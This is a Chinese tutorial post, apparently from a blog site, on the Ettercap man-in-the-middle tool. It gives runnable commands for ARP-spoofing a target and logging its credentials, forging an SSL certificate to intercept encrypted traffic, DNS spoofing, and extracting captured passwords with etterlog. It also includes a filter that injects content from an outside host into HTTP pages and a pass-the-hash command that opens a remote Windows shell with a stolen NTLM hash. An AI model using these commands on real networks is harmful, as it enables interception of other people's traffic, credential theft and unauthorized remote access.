中间人攻击_Ettercap

本文介绍Ettercap工具的功能及使用方法,包括中间人攻击、DNS欺骗等技术手段,并探讨了SSL中间人攻击及密码破解技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Ettercap

  • 统一的中间人攻击工具

  • 转发MAC与本机相同,但IP与本机不同的数据包

  • 支持SSH1\SSL中间人攻击

模块划分

  • Snifer

  • MITM

  • Filter

  • Log

  • Plugin

Snifer

  • 负责数据包转发

  • Unified

  • 单网卡情况下独立完成三层包转发

  • 始终禁用内核IP_Forward功能

  • Bridge

  • 双网卡情况下的一层MITM模式

  • 可作为IPS过滤数据包

  • 不可在网关上使用(透明网桥)

MITM

  • 把流量重定向到ettercap主机上

  • 可以使用其他工具实现MITM,ettercap只做嗅探和过滤使用

实现MITM的方法

  • ARP

  • ICMP

  • ICMP路由重定向,半双工

  • DHCP

  • 修改网关地址,半双工

  • Switch Port Straling

  • flood目标地址是本机,源地址是受害者的包

  • 适用于ARP静态绑定的环境

  • NDP

  • IPv6协议欺骗技术

  • 2.4以上内核对ARP地址欺骗的约束

  • 收到非请求的ARP相应包,不更新本地ARP缓存

  • Errercap使用ARP request包进行攻击

  • Solaris不根据ARP包更新本地ARP缓存

  • Ettercap使用先发ICMP包来更新ARP缓存

用户操作界面

-T      文本界面-G      图形界面-C      基于文本的图形界面-D      后台模式

图片

  • 指定目标

  • IPv4:MAC/IPs/Ports

  • IPv6:MAC/IPs/Ports

  • /10.0.0.1-5;10.0.0.1.33/20-25,80,110

权限配置

  • 首先修改配置,默认情况下,ettercap是以nobody的用户去运行的,

图片

  • 为了使用上不出问题,我们将其修改为root用户

图片

基于伪造证书的SSL MITIM

  • Bridge模式不支持SSL MITIM
openssl genrsa -out etter.ssl.crt 1024openssl req -new-keyetter.ssl.crt -out tmp.csropenssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt -out tmp.newcat tmp.new>>etter.ssl.crtrm -f tmp.newtmp.csr

字符模式

ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.2// -P autoadd -w a.cap -l loginfo -L logall -m message

之后1.2上面的数据就会被截获

图片

SSL MITM

将配置文件中这两个注释给去掉,才能抓取到加密流量

图片

DNS欺骗

  • dns_spoof插件配置文件

  • vi /etc/ettercap/etter.dns

图片

Ettercap日志查看

  • etterlog -p log.eci #查看获取的密码

  • etterlog -c log.ecp #例如Log中的连接

  • etterlog -c -f /1.1.1.1// log.ecp

  • etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa #选择相应的连接并榨取文件

过滤Filter

/usr/share/ettercap

图片

  • 例如 etter.filter.ssh这个过滤器就是来过滤SSH的账号密码的

  • 使用这个过滤器是要先进行编译

etterfilter etter.filter.ssh -o ssh.ef

之后加-F参数就可以了

替换HTTP内容

if (ip.proto == TCP && tcp.src == 80){msg("data on TCP 80\n");replace(" img src=","img src=\"http://1.1.1.1/1.gif\" ");replace("IMG src=", "img src=\"http://1.1.1.1/1.gif\"");replace("IMG SRC=". "img src=\"http://1.1.1.1/1.gif\" ");}
基于ICMP
-M icmp:00:11:22:33:44/10.0.0.1  (真实的网关MAC/IP)
DHCP
-M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1(DNS)
Port
-M port /1.1.1.1// /1.1.1.2//
NDP
-M ndp //xxxx::xxxx:xxxx:xxxx:xxxx/ //xxxx:xxx:x:x/

Pass the Hash(PTH)

  • 密码破解耗费时间资源巨大

  • 使用密文提交给服务器直接完成身份认证

  • NTLM/LM是没有加盐的静态HASH密文

  • 企业中使用ghost等工具来克隆安装系统

pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063716ab7fe2a11faf126d8 //1.1.1.1 cmd
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值